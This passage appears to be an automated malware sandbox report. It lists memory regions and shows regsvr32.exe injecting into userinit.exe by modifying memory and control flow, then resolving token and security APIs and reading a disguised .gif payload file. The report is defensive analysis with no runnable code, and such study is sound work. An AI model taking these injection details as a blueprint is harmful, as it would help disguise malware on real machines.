private_0x0000000000850000	0x00850000	0x0090cfff	Private Memory	rw	-
private_0x0000000000910000	0x00910000	0x0094ffff	Private Memory	rw	-
pagefile_0x0000000000950000	0x00950000	0x00d42fff	Pagefile Backed Memory	r	-
private_0x0000000000d50000	0x00d50000	0x00e5cfff	Private Memory	rw	-
private_0x0000000000e80000	0x00e80000	0x00ebffff	Private Memory	rw	-
userinit.exe	0x00ec0000	0x00ec8fff	Memory Mapped File	rwx	-
pagefile_0x0000000000ed0000	0x00ed0000	0x01acffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01ad0000	0x023fffff	Memory Mapped File	r	-
private_0x0000000002400000	0x02400000	0x024fffff	Private Memory	rw	-
private_0x0000000002500000	0x02500000	0x026fffff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x02782fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x02786fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x0278afff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x0278efff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x02792fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x02796fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x0279afff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x0279efff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027a2fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027a6fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027aafff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027aefff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027b2fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027b6fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027bafff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027befff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027c4fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027c8fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027ccfff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027d2fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027d6fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027dafff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027defff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027e4fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027e8fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027ecfff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027f2fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027f6fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027fafff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027fefff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x02804fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x02808fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x0280cfff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x02880fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x02896fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x0289afff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x0289efff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028b4fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028b8fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028bcfff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028c0fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028d6fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028dafff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028defff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028f4fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028f8fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028fcfff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x02900fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x02916fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x0291afff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x0291ffff	Private Memory	-	-
private_0x0000000002890000	0x02890000	0x02952fff	Private Memory	rw	-
private_0x00000000028a0000	0x028a0000	0x02970fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029b2fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029d0fff	Private Memory	rw	-
private_0x0000000002910000	0x02910000	0x02a12fff	Private Memory	rw	-
private_0x0000000002920000	0x02920000	0x02a32fff	Private Memory	rwx	-
private_0x0000000002a40000	0x02a40000	0x02b3ffff	Private Memory	-	-
private_0x0000000002d00000	0x02d00000	0x02dfffff	Private Memory	rw	-
sortdefault.nls	0x02e00000	0x030cefff	Memory Mapped File	r	-
comctl32.dll	0x6d6b0000	0x6d733fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d800000	0x6d818fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd3000	0x7ffd3000	0x7ffd3fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffd3008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0x984, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d800000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d6b0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ó, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d6e266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d6e2542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d6e1d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d6e238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d6e20c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d6e1fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d6e1e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d6e1f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d6e1ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d6e216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d6e22be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d6e21e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8020ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8020b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8020c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8020d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #57: userinit.exe

222

0

»

Information	Value
ID	#57
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:39, Reason: Child Process
Unmonitor	End Time: 00:03:44, Reason: Self Terminated
Monitor Duration	00:00:05

OS Process Information

»

Information	Value
PID	0x94c
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 950 0x A8C 0x 978

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00100000	0x00100fff	Memory Mapped File	r	-
private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	rw	-
private_0x0000000000150000	0x00150000	0x00150fff	Private Memory	rwx	-
pagefile_0x0000000000160000	0x00160000	0x00161fff	Pagefile Backed Memory	r	-
private_0x00000000001a0000	0x001a0000	0x001affff	Private Memory	rw	-
private_0x0000000000210000	0x00210000	0x0021ffff	Private Memory	rw	-
private_0x0000000000220000	0x00220000	0x0029ffff	Private Memory	rw	-
userinit.exe	0x002c0000	0x002c8fff	Memory Mapped File	rwx	-
pagefile_0x00000000002d0000	0x002d0000	0x00397fff	Pagefile Backed Memory	r	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x0054efff	Pagefile Backed Memory	r	-
private_0x0000000000550000	0x00550000	0x0064ffff	Private Memory	rw	-
pagefile_0x0000000000650000	0x00650000	0x00750fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000760000	0x00760000	0x0135ffff	Pagefile Backed Memory	r	-
private_0x0000000001360000	0x01360000	0x0145ffff	Private Memory	-	-
private_0x0000000001460000	0x01460000	0x0157ffff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x014e0fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x014e4fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x014e8fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x014ecfff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x014f0fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x014f4fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x014f8fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x014fcfff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x01500fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x01504fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x01508fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x0150cfff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x01510fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x01514fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x01518fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x0151cfff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x01520fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x01524fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x01528fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x0152cfff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x01530fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x01534fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x01538fff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x0153cfff	Private Memory	rw	-
private_0x00000000014b0000	0x014b0000	0x014effff	Private Memory	rw	-
private_0x0000000001540000	0x01540000	0x0157ffff	Private Memory	rw	-
private_0x0000000001580000	0x01580000	0x017affff	Private Memory	rw	-
private_0x0000000001580000	0x01580000	0x0168cfff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x01712fff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x01716fff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x0171afff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x0171efff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x01722fff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x01726fff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x0172afff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x0172efff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x01732fff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x01736fff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x0173afff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x0173efff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x01742fff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x01746fff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x0174afff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x0174efff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x01752fff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x01756fff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x0175afff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x0175efff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x01762fff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x01766fff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x0176afff	Private Memory	rw	-
private_0x0000000001690000	0x01690000	0x0176efff	Private Memory	rw	-
private_0x0000000001770000	0x01770000	0x017affff	Private Memory	rw	-
staticcache.dat	0x017b0000	0x020dffff	Memory Mapped File	r	-
pagefile_0x00000000020e0000	0x020e0000	0x024d2fff	Pagefile Backed Memory	r	-
private_0x00000000024e0000	0x024e0000	0x025dffff	Private Memory	rw	-
private_0x00000000025e0000	0x025e0000	0x027dffff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028c0fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028c4fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028c8fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028ccfff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028d2fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028d6fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028dafff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028defff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028e4fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028e8fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028ecfff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029b2fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029b6fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029bafff	Private Memory	rw	-
